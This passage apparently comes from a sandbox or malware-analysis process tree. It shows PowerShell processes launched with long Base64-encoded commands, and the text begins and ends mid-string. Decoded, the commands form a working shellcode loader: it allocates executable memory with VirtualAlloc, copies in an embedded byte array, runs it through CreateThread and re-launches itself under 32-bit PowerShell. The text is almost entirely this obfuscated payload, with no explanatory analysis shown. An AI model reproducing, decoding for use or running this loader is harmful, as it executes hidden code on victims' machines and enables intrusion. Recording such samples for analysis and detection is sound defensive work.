oAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
2⤵
PID:7060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
PID:6488

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwA